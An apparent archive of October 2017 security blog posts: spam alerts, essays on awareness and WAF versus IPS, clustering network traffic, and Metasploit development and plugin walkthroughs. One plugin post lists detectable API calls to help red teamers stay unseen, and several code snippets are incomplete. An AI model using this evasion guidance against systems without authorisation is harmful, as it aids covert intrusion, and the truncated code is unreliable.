Monthly Archives: October 2017

Bogus porn blackmail attempt from

This blackmail attempt is completely bogus, sent from a server belonging to the domain. From:    Hannah Taylor [] Reply-To: To:    contact@victimdomail.tld Date:    31 October 2017 at 15:06 Subject:    ✓ Tiскеt ID: DMS-883-97867 [contact@victimdomail.tld] 31/10/2017 03:35:54 Maybe this will change your life Signed

Design For Behavior, Not Awareness

October was National Cybersecurity Awareness Month. Since today is the last day, I figured now is as good a time as any to take a contrarian perspective on what undoubtedly many organizations just did over the past few weeks; namely, wasted a lot of time, money, and good will.

Most security awareness programs and practices are horrible BS. This extends out to include many practices heavily promoted by the likes of SANS, as well as the current state of "best" (aka, failing miserably) practices. We shouldn't, however, be surprised that it's all a bunch of nonsense. After all, awareness budgets are tiny, the people running these programs tend to be poorly trained and uneducated, and in general there's a ton of misunderstanding about the point of these programs (besides checking boxes).

To me, there are three kinds of security awareness and education objectives:
1) Communicating new practices
2) Addressing bad practices
3) Modifying behavior

The first two areas really have little to do with behavior change so much as they're about communication. The only place where behavior design comes into play is when the secure choice isn't the easy choice, and thus you have to build a different engagement model. Only the third objective is primarily focused on true behavior change.

Awareness as Communication

The vast majority of so-called "security awareness" practices are merely focused on communication. They tell people "do this" or "do that" or, when done particularly poorly, "you're doing X wrong idiots!" The problem is that, while communication is important and necessary, rarely are these projects approached from a behavior design perspective, which means nobody is thinking about effectiveness, let alone how to measure for effectiveness.

Take, for example, communicating updated policies. For example, maybe your organization has decided to revise its password policy yet again (woe be to you!). You can undertake a communication campaign to let people know that this new policy is going into effect on a given date, and maybe even explain why the policy is changing. But, that's about it. You're telling people something theoretically relevant to their jobs, but not much more. This task could be done just as easily be your HR or internal communication team as anyone else. What value is being added?

Moreover, the best part of this is that you're not trying to change a behavior, because your "awareness" practice doesn't have any bearing on it; technical controls do! The password policy is implemented in IAM configurations and enforced through technical controls. There's no need for cognition by personnel beyond "oh, yeah, I now have to construct my password according to new rules." It's not like you're generally giving people the chance to opt out of the new policy, and there's no real decision for them to make. As such, the entire point of your "awareness" is communicating information, but without any requirement for people to make better choices.

Awareness as Behavior Design

The real role of a security awareness and education program should be on designing for behavior change, then measuring the effectiveness of those behavior change initiatives. The most rudimentary example of this is the anti-phishing program. Unfortunately, anti-phishing programs also tend to be horrible examples because they're implemented completely wrong (e.g., failure to benchmark, failure to actually design for behavior change, failure to get desired positive results). Yes, behavior change is what we want, but we need to be judicious about what behaviors we're targeting and how we're to get there.

I've had a strong interest in security awareness throughout my career, including having built and delivered awareness training and education programs in numerous prior roles. However, it's only been the last few years that I've started to find, understand, and appreciate the underlying science and psychology that needs to be brought to bear on the topic. Most recently, I completed BJ Fogg's Boot Camp on behavior design, and that's the lens through which I now view most of these flaccid, ineffective, and frankly incompetent "awareness" programs. It's also what's led me to redefine "security awareness" as "behavioral infosec" in order to highlight the importance of applying better thinking and practices to the space.

Leveraging Fogg's models and methods, we learn that Behavior happens when three things come together: Motivation, Ability, and a Trigger (aka a prompt or cue). When designing for behavior change, we must then look at these three attributes together and figure out how to specifically address Motivation and Ability when applying/instigating a trigger. For example, if we need people to start following a better, preferred process that will help reduce risk to the organization, we must find a way to make it easy to do (Ability) or find ways to make them want to follow the new process (Motivation). Thus, when we tell them "follow this new process" (aka Trigger), they'll make the desired choice.

In this regard, technical and administrative controls should be buttressed by behavior design whenever a choice must be made. However, sadly, this isn't generally how security awareness programs view the space, and thus just focus on communication (a type of Trigger) without much regard for also addressing Motivation or Ability. In fact, many security programs experience frustration and failure because what they're asking people to do is hard, which means the average person is not able to do what's asked. Put a different way, the secure choice must be the easy choice, otherwise it's unlikely to be followed. Similarly, research has shown time and time again that telling people why a new practice is desirable will greatly increase their willingness to change (aka Motivation). Seat belt awareness programs are a great example of bringing together Motivation (particularly focused on negative outcomes from failure to comply, such as reality of death or serious injury, as well as fines and penalties), Ability (it's easy to do), and Triggers to achieved a desired behavioral outcome.

Overall, it's imperative that we start applying behavior design thinking and principles to our security programs. Every time you ask someone to do something different, you must think about it in terms of Motivation and Ability and Trigger, and then evaluate and measure effectiveness. If something isn't working, rather than devolving to a blame game, instead look at these three attributes and determine if perhaps a different approach is needed. And, btw, this may not necessarily mean making your secure choice easier so much as making the insecure choice more difficult (for example, someone recently noted on twitter that they simply added a wait() to their code to force deprecation over time)

Change Behavior, Change Org Culture

Another interesting aspect of this discussion on behavior design is this: organizational culture is the aggregate of behaviors and values. That is to say, when we can change behaviors, we are in fact changing org culture, too. The reverse, then, is also true. If we find bad aspects of org culture leading to insecure practices, we can then factor those back into the respective behaviors, and then start designing for behavior change. In some cases, we may need to break the behaviors into chains of behaviors and tackle things more slowly over time, but looking at the world through this lens can be quite enlightening. Similarly, looking at the values ensconced within org culture also let's us better understand motivations. People generally want to perform their duties, and do a reasonably decent job at it. This is generally how performance is measured, and those duties and performance measures are typically aligned against outcomes and - ultimately - values.

One excellent lesson that DevOps has taught us (there are many) is that we absolutely can change how the org functions... BUT... it does require a shift in org culture, which means changing values and behaviors. These sorts of shifts can be done either top-down or bottom-up, but the reality is that top-down is much easier in many regards, whereas bottom-up requires that greater consensus and momentum be built to achieve a breakthrough.

DevOps itself is cultural in nature and focuses heavily on changing behaviors, ranging from how dev and ops function, to how we communicate and interact, and so on. Shortened feedback loops and creating space for experimentation are both behavioral, which is why so many orgs struggle with how to make them a reality (that is, it's not simply a matter of better tools). Security absolutely should be taking notes and applying lessons learned from the DevOps movement, including investing in understanding behavior design.

To wrap this up, here are three quick take-aways:

1) Reinvent "security awareness" to be "behavioral infosec" toward shifting to a behavior design approach. Behavior design looks at Motivation, Ability, and Triggers in affecting change.

2) Understand the difference between controls (technical and administrative) and behaviors. Resorting to basic communication may be adequate if you're implementing controls that take away choices. However, if a new control requires that the "right" choice be made, you must then apply behavior design to the project, or risk failure.

3) Go cross-functional and start learning lessons from other practice areas like DevOps and even HR. Understand that everything you're promoting must eventually tie back into org culture, whether it be through changes in behavior or values. Make sure you clearly understand what you're trying to accomplish, and then make a very deliberate plan for implementing changes while addressing all appropriate objectives.

Going forward, let's try to make "cybersecurity awareness month" about something more than tired lines and vapid pejoratives. It's time to reinvent this space as "behavioral infosec" toward achieving better, measurable outcomes.

Incremental "Gains" Are Just Slower Losses

Anton Chuvakin and I were having a fun debate a couple weeks ago about whether incremental improvements are worthwhile in infosec, or if it's really necessary to "jump to the next curve" (phrase origin: Guy Kawasaki's "Art of Innovation," watch his TedX) in order to make meaningful gains in security practices. Anton even went so far as to write about it a little over a week ago (sorry for the delayed response - work travel). As promised, I feel it's important to counter his arguments a bit.

Anton started by asking, "[Can] you really jump to the "next curve" in security, or do you have to travel the entire journey from the old ways to the cutting edge?"

Of course, this is a sucker's question, and it belies misunderstanding the whole "jump to the next curve" argument, which was conceived by Kawasaki in relation to innovation, but can be applied to strategy in general. In speaking of the notion, Kawasaki says "True innovation happens when a company jumps to the next curve-or better still, invents the next curve, so set your goals high." And this, here, is the point of arguing for organizations to not settle for incremental improvements, but instead to aim higher.

To truly understand this notion in context, let's first think about what would be separate curves in a security practice vertical. Let's take Anton's example of SOCs, SIEM, log mgmt, and threat hunting. To me, the curves might look like this:
- You have no SOC, SIEM, log mgmt
- You start doing some logging, mostly locally
- You start logging to a central location and having a team monitor and manage
- You build or hire a SOC to more efficiently monitor and respond to alerts
- You add in stronger analytics, automation, and threat hunting capabilities

Now, from a security perspective, if you're in one of the first couple stages today (and a lot of companies are!), then a small incremental improvement like moving to central logs might seem like a huge advance, but you'd be completely wrong. Logically, you're not getting much actual risk reduction by simply dumping all your logs to a central place unless you're also adding monitoring, analytics, and response+hunting capabilities at the same time!

In this regard, "jump to the next curve" would likely mean hiring an MSSP to whom you can send all your log data in order to do analytics and proactive threat hunting. Doing so would provide a meaningful leap in security capabilities and would help an organization catch-up. Moreover, even if you spent a year making this a reality, it's a year well-spent, whereas a year spent simply enabling logs without sending them to a central repository for meaningful action doesn't really improve your standing at all.

In Closing

In the interest in keeping this shorter than usual, let's just jump to the key takeaways.

1) The point of "jump to the next curve" is to stop trying to "win" through incremental improvements of the old and broken, instead leveraging innovation to make up lost ground ground by skipping over short-term "gains" that cost you time without actually gaining anything.

2) The farther behind you are, the more important it is to look for curve-jumping opportunities to dig out of technical debt. Go read DevOps literature on how to address technical debt, and realize that with incremental gains, you're at best talking about maintaining your position, not actually catching up. Many organizations are far behind today and cannot afford such an approach.

3) Attacks are continuing to rapidly evolve, which means your resilience relies directly on your agility and ability to make sizable gains in a short period of time. Again, borrowing from DevOps, it's past time to start leveraging automation, cloud services, and agile techniques to reinvent the security program (and, really, organizations overall) to leap out of antiquated, ineffective practices.

4) Anton quipped that "The risks with curve jumping are many: you can jump and miss (wasting resources and time) or you can jump at the wrong curve or you simply have no idea where to jump and where the next curve is." To a degree, yes, this is true. But, in many ways, for organizations that are 5-10 years behind in practices (again, this applies to a LOT of you!), we know exactly where you should go. Even Gartner advice can be useful in this regard! ;) The worst thing you can do is decide not to take an aggressive approach to getting out of technical security debt for fear of choosing the "wrong" path.

5) If you're not sure where the curves are, here's a few suggestions:
- Identity as Perimeter - move toward Zero Trust, heavily leveraging federated identity/IDaaS
- Leverage an MSSP to central manage and monitor log data, including analytics and threat hunting
- Automate, automate, automate! You don't need to invest in expensive security automation tools. You can do a lot with general purpose IT automation tools (like Ansible, Chef, Puppet, Jenkins, Travis, etc.). If you think you need a person staring a dashboard, clicking a button when a color changes, then I'm sorry to tell you that this can and should be automated.
- If your org writes code, then adopt DevOps practices, getting a CI/CD pipeline built, with appsec testing integrated and automated.
- Heavily leverage cloud services for everything!

Good luck, and may the odds be ever in your favor! :)

Open Source Pentesting

My talk today at Wild West Hacking Fest was about some documents that I released here. I’ll make this blog post more indepth later but for right now I wanted to get the slides out.

(If you can’t access one of the documents yet, don’t ask for permission to do so, it just means either they aren’t ready yet, I’ll make posts about each one as they become available)

Here is the main slide deck for the docs:

Here are the slides for the release talk (not the same as the link above):

VirusTotal += Cybereason

We welcome Cybereason scanner to VirusTotal. In the words of the company:

“Cybereason has developed a comprehensive platform to manage risk, including endpoint detection and response (EDR) and next generation antivirus (NGAV). Cybereason’s NGAV solution is underpinned by a proprietary machine learning (ML) anti-malware engine that was built and trained to block advanced attacks such as never-before-seen malware, ransomware, and fileless malware. The cloud-enabled engine conducts both static binary analysis and dynamic behavioral analysis to increase detection of known and unknown threats. Files submitted to VirusTotal will be analyzed by Cybereason’s proprietary ML anti-malware engine and the rendered verdicts will be available to VirusTotal users.”

Cybereason has expressed its commitment to follow the recommendations of AMTSO and, in compliance with our policy, facilitates this review by SE Labs, an AMTSO-member tester.

Switching Ruby Version in RVM for Metasploit Development

If you have setup a development environment with RVM to do development in Metasploit Framework you are bound to encounter that the Metasploit team has changed preferred Ruby versions.

carlos@ubuntu:/opt$ cd metasploit-framework/
ruby-2.4.2 is not installed.
To install do: 'rvm install ruby-2.4.2'

You get a useful message that mentions the RVM command you need to run to install the new version but there is a bit more to do to fully migrate to the new version. Lets stat installing the new version of Ruby by running the command specified when we switched to the folder rvm install 2.4.2:

$ rvm install 2.4.2

Now that the new version is installed lets migrate gemsets. In my case I set the gemset in RVM to the one recommended by the Metasploit dev team, with the metasploit-framework name. The name tag allows me to migrate one gemset from one version of Ruby to the other using the gemset copy command:

$ rvm gemset copy ruby-2.4.1@metasploit-framework ruby-2.4.2@metasploit-framework

Now that we migrated the gemsets I make the new Ruby and gemset the default for my console.

$ rvm --default use ruby-2.4.2@metasploit-framework

I can quickly test to see I have the correct version of Ruby:

$ ruby -v
ruby 2.4.2p198 (2017-09-14 revision 59899) [x86_64-linux]
$ rvm list

rvm rubies

   ruby-2.4.1 [ x86_64 ]
=* ruby-2.4.2 [ x86_64 ]

# => - current
# =* - current && default
#  * - default

I can also check the gemset is the correct one and set as default:

$ rvm gemset list

gemsets for ruby-2.4.2 (found in /home/carlos/.rvm/gems/ruby-2.4.2)
=> metasploit-framework

Once that is done I will generate the ri documentation. I find it very useful specially when I'm traveling or in any other environment without internet access where I can not do a simple Google search. 

$ rvm docs generate-ri

Once done I can test that the documentation was generated by looking at the help information for the Array object and for the method each for the object. 

$ ri Array
$ ri Array#each

I hope those of you getting started with coding against Metasploit Framewok find this information useful.

Updated 3NT Solutions LLP / / IP ranges

When I was investigating IOCs for the recent outbreak of BadRabbit ransomware I discovered that it downloaded from a domain hosted on This IP belongs to a company called 3NT Solutions LLP that I have blogged about before. It had been three-and-a-half years since I looked at their IP address ranges so I thought I would give them a refresh. My personal recommendation

WAF and IPS. Does your environment need both?

WAF and IPS. Does your environment need both?

I have been in fair amount of discussions with management on the need for WAF, and IPS; they often confuse them and their basic purpose. It has been usually discussed after a pentest or vulnerability assessment, that if I can't fix this vulnerability - shall I just put an IPS or WAF to protect the intrusion/ exploitation? Or, sometimes they are considered as the silver bullet to thwart off the attackers instead of fixing the bugs. So, let me tell you - This is not good!

The security products are well suited to protect from something "unknown" or something that you have "unknowingly missed". It is not a silver bullet or an excuse to keep systems/ applications unpatched.

Security shouldn't be an AND/OR case. More the merrier only if they have been configured properly and each one of the product(s) has a different role to play under the flag of defense in depth! So, while I started this article as WAF vs. IPS - it's time to understand it's WAF and IPS. The ecosystem of your production environment is evolving and so is the threat landscape - it's more complex to protect than it was 5 years ago. Attackers are running at your pace, if not faster & a step ahead. These adversary as well piggy-back existing threats to launch their exploits. Often something that starts as simple as DDOS to overwhelm your networks, concedes in an application layer attack. So, network firewall, application firewall, anti-malware, IPS, SIEM etc. all have an important task and should be omnipresent with bells and whistles!

Nevertheless, whether it's a WAF or an IPS; each has it's own purpose and though they can't replace each other, they often have gray areas under which you can rest your risks. This blog will try to address these gray areas, and the associated differences to make life easier when it comes to WAF (Web Application Firewall) or IPS (Intrusion Prevention System). The assumption is both are modern products, and the IPS have deep packet inspection capabilities. Now, let's try to understand the infrastructure, environment and scope of your golden eggs before we can take a call which is the best way to protect the data,

  1. If you are protecting only the "web applications" running on HTTP sockets, then WAF is enough. IPS will be cherry on cake.
  2. If you are protecting all sorts of traffic - SSH, FTP, HTTP etc. then WAF is of less use at it can't inspect non HTTP traffic. I would recommend having a deep packet inspection IPS.
  3. WAF must not be considered as an alternative for traditional network firewalls. It works on the application layer and hence is primarily useful on HTTP, SSL (decryption), Javascript, AJAX, ActiveX, Session management kind of traffic.
  4. A typical IPS does not decrypt SSL traffic, and therefore is insufficient in packet inspection on HTTPS session.
  5. There is wide difference in the traffic visibility and base-lining for anomalies. While WAF has an "understanding" of traffic - HTTP GET, POST, URL, SSL etc. the IPS only understands it as network traffic and therefore can do layer 3/4 checks - bandwidth, packet size, raw protocol decoding/ anomalies but not the GET/ POST or session management.
  6. IPS is useful in cases where RDP, SSH or FTP traffic has to be inspected before it reaches the box to make sure that the protocol is not tampered or wrapped with another TCP packet etc.

Both the technologies have matured and have many gray areas of working but understand that WAF knows and capture the contents of HTTP traffic to see if there is a SQL injection, XSS or cookie manipulation but the IPS have very little or no understanding of the underlying application, therefore can't do much with the traffic contents. An IPS can't raise an alarm if someone is getting confidential data out, or even sending a harmful parameter to your application - it will let it through if it's a valid HTTP packet.

Now, with the information I just shared, try to have a conversation with your management on how to provide the best layered approach in security. How to make sure the network, and application is resilient to complex attacks and threats lurking at your perimeter, or inside.

Be safe.

Malware spam: "Order acknowledgement for BEPO/N1/380006006(2)"

A change to the usual Necurs rubbish, this fake order has a malformed .z archive file which contains a malicious executable with an icon to make it look like an Office document. Reply-To:    purchase@animalagriculture.orgTo:    Recipients [DY]Date:    24 October 2017 at 06:48Subject:    FW: Order acknowledgement for BEPO/N1/380006006(2)Dear All,Kindly find the attached Purchase order# IT/

Basics of The Metasploit Framework API – IRB Setup

Those of you who have taken my "Automating Metasploit Framework" class all this material should not be new. I have decided to start making a large portion of the class available here in the blog as a series. 

On this post I will cover the basics of setting up IRB so we can start exploring in a general sense the Metasploit Framework API. The API is extensive and sadly it would take quite a bit of time over it all, in the series I will covers the basic API calls and provide enough knowledge so you can continue learning the rest on your own or as needed. 

For this you need to be running a development environment. The Metasploit team has documentation on how to setup one 

If you are new to Ruby or come from another language and are learning the syntax here is a Ruby Primer.

What is IRB

IRB is the Interactive Ruby Shell, a REPL (Read -> Eval -> Print Loop) that will allow us to to interact with the Framework in real time allowing us to test and validate ideas quickly. One big advantage of the Metasploit Framework is that we can run IRB from inside msfconsole it self. When invoked from inside msfconsole we are running from the context of the loaded instance of the framework with access to all of the instances of objects inside and libraries. 

To test IRB you can just launch msfconsole and run the irb ruby statements and see the output they generate:

carlos@ubuntu:~$ msfconsole -q
msf > irb
[*] Starting IRB shell...

>> 1 +2
=> 3
>> print_status("hello world")
[*] hello world
=> nil

To exit from irb and fo back to the msfconsole one simply needs to type exit

>> exit
msf > 

IRB Basics

Lets cover some basic usage of IRB before we go in to extending it. You may find your self SSH or at the console of a server where you have not been able to tune IRB to you liking so having knowledge on some basic concepts in using IRB should be of value.  The following are tips on what I have found useful in helping me understand and explore the ever changing Metasploit Framework when I work form IRB.

Everything in Ruby is an object and the type of object will dictate what we can do with it. We can look at what type an object is by calling the Class attribute. 

>> "This is text".class
=> String
>> 1.class
=> Integer
>> framework.class
=> Msf::Framework
>> framework.db.class
=> Msf::DBManager

Like with any object in Ruby each object will have Methods and Attributes (Properties). Every Attribute of a ruby object is accessed and set via methods. We can take a look at the methods we have available by calling Object.methods

>> framework.methods
=> [:load_config, :on_module_created, :stats, :cache_thread, :cache_thread=, :cache_initialized, :cache_initialized=, :save_config, :init_simplified, :stats=, :on_module_run, :on_module_complete, :on_module_error, :on_module_load, :init_module_paths, :inspect, :options, :version, :plugins, :post, :search, :modules, :datastore, :nops, :encoders, :payloads, :options=, :modules=, :threads, :sessions, :jobs, :db, :events, :events=, :datastore=, :jobs=, :plugins=, :uuid_db, :uuid_db=, :browser_profiles, :browser_profiles=, :exploits, :auxiliary, :auxmgr, :threads?, :auxmgr=, :db=, :synchronize, :mon_try_enter, :try_mon_enter, :mon_enter, :mon_exit, :mon_synchronize, :new_cond, :`, :to_yaml, :to_yaml_properties, :to_json, :psych_to_yaml, :blank?, :present?, :try, :as_json, :presence, :acts_like?, :to_param, :to_query, :try!, :duplicable?, :to_json_with_active_support_encoder, :to_json_without_active_support_encoder, :instance_values, :instance_variable_names, :html_safe?, :deep_dup, :in?, :presence_in, :with_options, :dclone, :old_send, :encode_length, :decode_sequence, :assert_no_remainder, :decode_octet_string, :decode_integer, :decode_tlv, :encode_integer, :encode_octet_string, :encode_sequence, :encode_tlv, :decode_object_id, :decode_ip_address, :decode_timeticks, :build_integer, :decode_integer_value, :decode_uinteger_value, :decode_object_id_value, :integer_to_octets, :encode_tagged_integer, :encode_null, :encode_exception, :encode_object_id, :unloadable, :require_or_load, :require_dependency, :load_dependency, :pretty_print, :pretty_print_cycle, :pretty_print_instance_variables, :pretty_print_inspect, :instance_of?, :public_send, :instance_variable_get, :instance_variable_set, :instance_variable_defined?, :remove_instance_variable, :private_methods, :kind_of?, :instance_variables, :tap, :method, :public_method, :singleton_method, :class_eval, :is_a?, :extend, :pretty_inspect, :require_with_backports, :define_singleton_method, :to_enum, :enum_for, :select, :concern, :<=>, :sleep, :===, :=~, :!~, :suppress_warnings, :eql?, :respond_to?, :freeze, :display, :object_id, :send, :gem, :silence, :silence_warnings, :to_s, :enable_warnings, :with_warnings, :silence_stderr, :silence_stream, :suppress, :capture, :quietly, :nil?, :hash, :class, :singleton_class, :clone, :dup, :itself, :taint, :tainted?, :untaint, :untrust, :trust, :untrusted?, :methods, :protected_methods, :frozen?, :public_methods, :singleton_methods, :!, :==, :!=, :__send__, :equal?, :instance_eval, :instance_exec, :__id__]

We get both the instance methods and the inherited methods on the object. We can look through the methods for those whose name contain a string by using the grep(<regex>) method 

>> framework.methods.grep(/module/)
=> [:on_module_created, :on_module_run, :on_module_complete, :on_module_error, :on_module_load, :init_module_paths, :modules, :modules=]

We get a list of the methods but we are not able to tell what parameters a method may take. To look at method number of parameters we can do Object.method(<method>).arity to look at the parameters we simply change the call to parameters Object.method(<method>).parameters

>> framework.db.method(:add_workspace).arity
=> 1
>> framework.db.method(:add_workspace).parameters
=> [[:req, :name]]

You may wonder why if we see 1 parameter why does the output show an array with a sub array with 2 values. The sub array refers to the parameter where the first param represent the type and the second the name. The types are:

  • req - required argument
  • opt - optional argument
  • rest - rest of arguments as array
  • keyreq - reguired key argument (2.1+)
  • key - key argument
  • keyrest - rest of key arguments as Hash
  • block - block parameter

Sometimes we want to look at the source code of the definition of the method. We can get a better understanding from the source and also we can read comments to get an even better understanding of the function of the method. Looking at the method we only need to look at the source_location method to get the file and its full path.

>> framework.db.method(:add_workspace).source_location
=> ["/opt/metasploit-framework/lib/msf/core/db_manager/workspace.rb", 5]

Configuring IRB

IRB is very useful but we can make it better by using several Ruby Gems and specifying some configuration parameters. There are several Gems that I use when working in IRB specifically with the Metasploit Framework. The following are the Gems I recommend to start with and that with experience you can change for others and tweak their settings. 

  • Wirble - very old gem for adding color to the terminal output among other things. There are newer ports and better gems for this but I have had bad luck getting them to work inside of MSF. This one even if old still gets the job done. 
  • awesome_print - prints in a easier to parse output visually an object. 
  • Code - Lets me look at the code of a object or a method of an object. 

Installing this gems is simple with the gem command:

$ gem install awesome_print wirble code

Once installed I need to allow Metasploit Framework to load them since they are not in the Gemset of the project and I can not add them to the Gemset file since msfupdate will replace the file. To allow this in the project folder we need to create a Gemfile.local file loading the current project gems and our additional gems.

# Include the Gemfile included with the framework. This is very
# important for picking up new gem dependencies.
msf_gemfile = File.join(File.dirname(__FILE__), 'Gemfile')
if File.readable?(msf_gemfile)

# Create a custom group
group :local do
  gem 'wirble'
  gem 'awesome_print'
  gem 'code'
  gem 'core_docs'

Now we need to create a .irbrc in our home folder in Linux or Mac OS to load out settings automatically when IRB is loaded. 

# Print message to show that irbrc loaded.
puts '~/.irbrc has been loaded.'

# Load wirb to colorize the console
require 'wirble'

# Load awesome_print.
require 'ap'

# Load the Code gem 
require 'code'

# Remove the annoying irb(main):001:0 and replace with >>

# Tab Completion
require 'irb/completion'

# Automatic Indentation

# Save History between irb sessions
require 'irb/ext/save-history'
IRB.conf[:SAVE_HISTORY] = 100
IRB.conf[:HISTORY_FILE] = "#{ENV['HOME']}/.irb-save-history"

# get all the methods for an object that aren't basic methods from Object
class Object
  def local_methods
    return (methods - Object.instance_methods)

Once Wirble is loaded and initialized the output of my console will be of a different color for different elements making it easier to look at. 


With awesome print I can have a even better view of an object and the output is colorized.


I set up IRB so it will indent and allow for tab complete, do be careful MSF is such a big project that tab complete for some stuff may hand and you may have to Crtl-C to stop it. I also have a function that shows me only the local methods so the list I have to go through is much shorter by removing all the inherited methods. 

>> framework.db.methods.count
=> 397
>> framework.db.local_methods.count
=> 261

The code gem will allow me to look at the code of a method to better understand it for a given object. 


I hope you have found this information useful. In the next series of post I will cover general APIs that should be of value when writing modules, plugins or automating the framework. 

Unsupervised Machine Learning in Cyber Security

After my latest blog post on “Machine Learning and AI – What’s the Scoop for Security Monitoring?“, there was a quick discussion on twitter and Shomiron made a good point that in my post I solely focused on supervised machine learning.

In simple terms, as mentioned in the previous blog post, supervised machine learning is about learning with a training data set. In contrast, unsupervised machine learning is about finding or describing hidden structures in data. If you have heard of clustering algorithms, they are one of the main groups of algorithms in unsupervised machine learning (the other being association rule learning).

There are some quite technical problems with applying clustering to cyber security data. I won’t go into details for now. The problems are related to defining distance functions and the fact that most, if not all, clustering algorithms have been built around numerical and not categorical data. Turns out, in cyber security, we mostly deal with categorical data (urls, usernames, IPs, ports, etc.). But outside of these mathematical problems, there are other problems you face with clustering algorithms. Have a look at this visualization of clusters that I created from some network traffic:

Unsupervised machine learning on network traffic

Some of the network traffic clusters incredibly well. But now what? What does this all show us? You can basically do two things with this:

  1. You can try to identify what each of these clusters represent. But the explainability of clusters is not built into clustering algorithms! You don’t know why something shows up on the top right, do you? You have to somehow figure out what this traffic is. You could run some automatic feature extraction or figure out what the common features are, but that’s generall not very easy. It’s not like email traffic will nicely cluster on the top right and Web traffic on the bottom right.
  2. You may use this snapshot as a baseline. In fact, in the graph you see individual machines. They cluster based on their similarity of network traffic seen (with given distance functions!). If you re-run the same algorithm at a later point in time, you could try to see which machines still cluster together and which ones do not. Sort of using multiple cluster snapshots as anomaly detectors. But note also that these visualizations are generally not ‘stable’. What was on top right might end up on the bottom left when you run the algorithm again. Not making your analysis any easier.

If you are trying to implement case number one above, you can make it a bit little less generic. You can try to inject some a priori knowledge about what you are looking for. For example, BotMiner / BotHunter uses an approach to separate botnet traffic from regular activity.

These are some of my thoughts on unsupervised machine learning in security. What are your use-cases for unsupervised machine learning in security?

PS: If you are doing work on clustering, have a look at t-SNE. It’s a clustering algorithm that does a multi-dimensional projection of your data into the 2-dimensional space. I have gotten incredible results with it. I’d love to hear from you if you have used the algorithm.

MS14-085 – Important: Vulnerability in Microsoft Graphics Component Could Allow Information Disclosure (3013126) – Version: 1.1

Severity Rating: Important
Revision Note: V1.1 (October 19, 2017): Corrected a typo in the CVE description.
Summary: This security update resolves a publicly disclosed vulnerability in Microsoft Windows. The vulnerability could allow information disclosure if a user browses to a website containing specially crafted JPEG content. An attacker could use this information disclosure vulnerability to gain information about the system that could then be combined with other attacks to compromise the system. The information disclosure vulnerability by itself does not allow arbitrary code execution. However, an attacker could use this information disclosure vulnerability in conjunction with another vulnerability to bypass security features such as Address Space Layout Randomization (ASLR).

Update to Pentest Metasploit Plugin

I recently update my Metasploit Pentest Plugin . I added 2 new commands to the plugin and fixed issues when printing information as a table. The update are small ones.

Lets take a look at the changes for the plugin. We can start by loading the plugin in a Metasploit Framework session.

msf > load pentest 

       ___         _          _     ___ _           _
      | _ \___ _ _| |_ ___ __| |_  | _ \ |_  _ __ _(_)_ _
      |  _/ -_) ' \  _/ -_|_-<  _| |  _/ | || / _` | | ' \ 
      |_| \___|_||_\__\___/__/\__| |_| |_|\_,_\__, |_|_||_|
Version 1.5
Pentest plugin loaded.
by Carlos Perez (carlos_perez[at]
[*] Successfully loaded plugin: pentest
msf > 

The first update is so we can get a list of IP Addresses you can use for LHOST. 

msf > get_lhost 
[*] Local host IP addresses:

The code is very simple. It gets a list of IP addresses from the interfaces on the host and it filters out the loopback address for IPv4 and the IPv6 Link Local address.  

    def cmd_get_lhost(*args)

      opts =
        "-h"   => [ false,  "Command help."]
      opts.parse(args) do |opt, idx, val|
        case opt
        when "-h"
          print_line("Command for listing local IP Addresses that can be used with LHOST.")

      print_status("Local host IP addresses:")
      Socket.ip_address_list.each do |a|
        if !(a.ipv4_loopback?()|a.ipv6_linklocal?()|a.ipv6_loopback?())

Those who have heard me talk in the podcast, listened to my presentation or taken any of my classes know I like proper tradecraft and a deep understanding of one tools. I added a command called check_footprint, the command will check you module for a list of API calls in post modules to check if the module may expose your action.

msf > check_footprint -h


    -h        Command Help.
    -m <opt>  Module to check.

The -m option allows you to specify a post module or exploit persistence module, it supports tab complete for the full name of the module. Once specified it will check the module source code and it will let you know if uses API calls that may be logged by a defender. If you are under the context of a module you can run the command without specifying the module name and it will examine the current module you are under. 


In the case that the module supports Shell type sessions it will warn you that all actions will be command line tools and actions may be logged. 


The list of APIs is a simple one that can be extended. Here is the hashtable I use of APIs and the description of what possible negative footprint they will have on the target.

footprint_generators = {
          'cmd_exec' => 'This module will create a process that can be logged.',
          '<client|session>.sys.process.execute' => 'This module will create a process that can be logged.',
          'run_cmd' => 'This module will create a process that can be logged.',
          'check_osql' => 'This module will create a osql.exe process that can be logged.',
          'check_sqlcmd' => 'This module will create a sqlcmd.exe process that can be logged.',
          'wmic_query' => 'This module will create a wmic.exe process that can be logged.',
          'get_whoami' => 'This module will create a whoami.exe process that can be logged.',
          "service_create" => 'This module manipulates a service in a way that can be logged',
          "service_start" => 'This module manipulates a service in a way that can be logged',
          "service_change_config" => 'This module manipulates a service in a way that can be logged',
          "service_change_startup" => 'This module manipulates a service in a way that can be logged',
          "get_vss_device" => 'This module will create a wmic.exe process that can be logged.',
          "vss_list" => 'This module will create a wmic.exe process that can be logged.',
          "vss_get_ids" => 'This module will create a wmic.exe process that can be logged.',
          "vss_get_storage" => 'This module will create a wmic.exe process that can be logged.',
          "get_sc_details" => 'This module will create a wmic.exe process that can be logged.',
          "get_sc_param" => 'This module will create a wmic.exe process that can be logged.',
          "vss_get_storage_param" => 'This module will create a wmic.exe process that can be logged.',
          "vss_set_storage" => 'This module will create a wmic.exe process that can be logged.',
          "create_shadowcopy" => 'This module will create a wmic.exe process that can be logged.',
          "start_vss" => 'This module will create a wmic.exe process that can be logged.',
          "start_swprv" => 'This module manipulates a service in a way that can be logged',
          "execute_shellcode" => 'This module will create a thread that can be detected (Sysmon).',
          "is_in_admin_group" => 'This module will create a whoami.exe process that can be logged.',
          "upload_file" => 'This module uploads a file on to the target, AVs will examine the file and action may be logged if folder is audited.',
          "file_local_write" => 'This module writes to a file or may create one, action may be logged if folder is audited or examined by AV.',
          "write_file" => 'This module writes to a file or may create one, action may be logged if folder is audited or examined by AV.',
          "append_file" => 'This module writes to a file or may create one, action may be logged if folder is audited or examined by AV.',
          "rename_file" => 'This module renames a file or may create one, action may be logged if folder is audited or examined by AV.'

I do plan on expanding the list and descriptions as time passes.

I hope you find these small changes also and that the check_footprint command makes you take in to consideration what actions modules are taking when executed that depending on the security posture of a target could get you detected if you are a Red Teamer. If you are in a Blue Team this may help you fine tune your detections and give you ideas of what behaviours to look for.   

Sysinternals Sysmon 6.10 Tracking of Permanent WMI Events

In my previous blog post I covered how Microsoft has enhanced WMI logging in the latest versions of their client and server operating systems. WMI Permanent event logging was also added in version 6.10 specific events for logging permanent event actions. The new events are:

